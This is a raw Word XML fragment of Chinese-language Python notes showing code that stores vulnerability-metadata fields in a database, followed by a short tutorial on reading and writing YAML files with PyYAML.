        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'aliyun_score'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'attack_path'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'attack_complexity'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'permission'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'affect_scope'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'exp_maturity'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'data_confidentiality'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'data_integrity'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'server_hazard'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'quantity_of_whole_network'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>item_data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'cwe_id_vul_type'</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ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">            cur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>execute</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sql, data</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ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        cur.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>close</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conn.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>commit</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">except </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>err:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        log_debug.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">"[!] Err: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>插入数据出现错误。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(err))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>finally</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conn.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>close</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DF1BEB" w14:textId="77777777" w:rsidR="00492A02" w:rsidRDefault="00492A02" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675A1BB5" w14:textId="77777777" w:rsidR="00492A02" w:rsidRDefault="00492A02" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4154751B" w14:textId="77777777" w:rsidR="00492A02" w:rsidRDefault="00492A02" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01585C3D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="528" w:name="_Toc159779965"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:bookmarkEnd w:id="528"/>
    </w:p>
    <w:p w14:paraId="35D73D0B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python3 -m pip install PyYAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4DA145" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4630A3F1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="529" w:name="_Toc159779966"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:bookmarkEnd w:id="529"/>
    </w:p>
    <w:p w14:paraId="530E2027" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>yaml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从文件读取成一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字典</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FF45C92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C90362A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>import yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037ABD08" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B2923B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>from pprint import pprint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA0AF5C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>GitPathsFile = "targetPaths.yaml"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7432AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    with open(GitPathsFile, 'r', encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC88039" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        targetPaths = yaml.safe_load(f)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EBC3BA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C0992E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(targetPaths)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C12EAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5828D986" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322DBD60" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FC6E198" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>with open(cnYamlPath, 'r', encoding='utf-8') as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC95644" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        poc_dict = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>yaml.load(f.read(), Loader=yaml.FullLoader)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FF4492" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        f.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF67507" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65F434CE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649AA391" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B81DEA0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="604657A5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="530" w:name="_Toc159779967"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>写入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="530"/>
    </w:p>
    <w:p w14:paraId="059D45A3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import yaml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8538E1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AE4188E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">a = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k1</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v1</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k2</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v2</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>} }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8EF381" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56204F57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>with open(cnYamlPath, "w", encoding="utf-8") as f:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30908E47" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            yaml.dump(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>, f, allow_unicode=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF132F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            f.close()</w:t>
      </w:r>
    </w:p>
